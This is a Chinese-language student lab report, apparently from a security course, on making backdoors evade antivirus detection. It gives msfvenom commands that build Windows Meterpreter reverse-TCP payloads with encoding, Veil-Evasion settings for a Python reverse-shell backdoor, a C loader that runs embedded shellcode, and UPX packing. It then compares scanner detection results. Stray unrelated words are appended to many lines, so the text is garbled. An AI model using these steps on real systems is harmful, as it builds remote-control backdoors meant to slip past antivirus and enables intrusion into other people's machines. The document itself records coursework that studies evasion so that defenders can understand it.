以前我命名的後面文件名稱爲"20155308_backdoor.exe",會產生如下提示:python
能夠看出,報毒率挺高。若是在使用msf時對它多編碼幾回,觀察報毒率的變化。(進行編碼十次)shell
Msfvenom是Metasploit平臺下用來編碼payloads免殺的工具。windows
# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=192.168.20.136 LPORT=443 -f exe > met-encoded.exe
將生成的文件放到網站上掃描一下:
安全
能夠發現不管編碼多少次都是同樣,因此想要利用編碼次數來達到免殺效果顯然是不行的。網絡
Veil-Evasion是一個免殺平臺,與Metasploit有點相似,在Kalil軟件庫中有,但默認沒裝。免殺效果比較好。tcp
use python/meterpreter/rev_tcp
設置payload。set LHOST 192.168.91.128
設置反彈鏈接IP(此IP爲kali機的IP地址),輸入命令set LPORT 5308設置反彈端口5308
。
generate
生成程序,並輸入後門程序名稱「hwf5308」hwf5308.exe
,路徑爲/var/lib/veil-evasion/output/compiled
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.91.130 LPORT=5308 -f c
20155308.c
,而後將unsigned char buf[]
賦值到其中,代碼以下:unsigned char buf[] = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30" ...... "\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5"; int main() { int (*func)() = (int(*)())buf; func(); }
壓縮殼UPX工具
# upx met_raw.exe -o met_raw.upxed.exe Ultimate Packer for eXecutables Copyright (C) 1996 - 2013 UPX 3.91 Markus Oberhumer, Laszlo Molnar & John Reiser Sep 30th 2013 File size Ratio Format Name -------------------- ------ ----------- ----------- 101678 -> 56110 55.18% win32/pe met.upxed.exe Packed 1 file. #
upx #須要加殼的文件名 -o #加殼後的文件名
此處爲了方便實驗,我將以前更名爲「hwf.exe」文件改成「5308.exe」。學習
本次實驗是瞭解惡意軟件檢測機制,經過這方面的漏洞進行文件的更改和後門的處理,用掃描軟件進行掃描,以此來觀察各類處理優缺點。經過實際的動手操做,驗咱們也能夠發現要想製做出免殺的病毒其實也並不難,可是最關鍵的仍是在於咱們要提升本身的安全意識。經過對後門文件各類方式的隱藏的學習,咱們應該反過來進行配置防火牆,監控端口等一些行爲來保障咱們計算機的安全。網站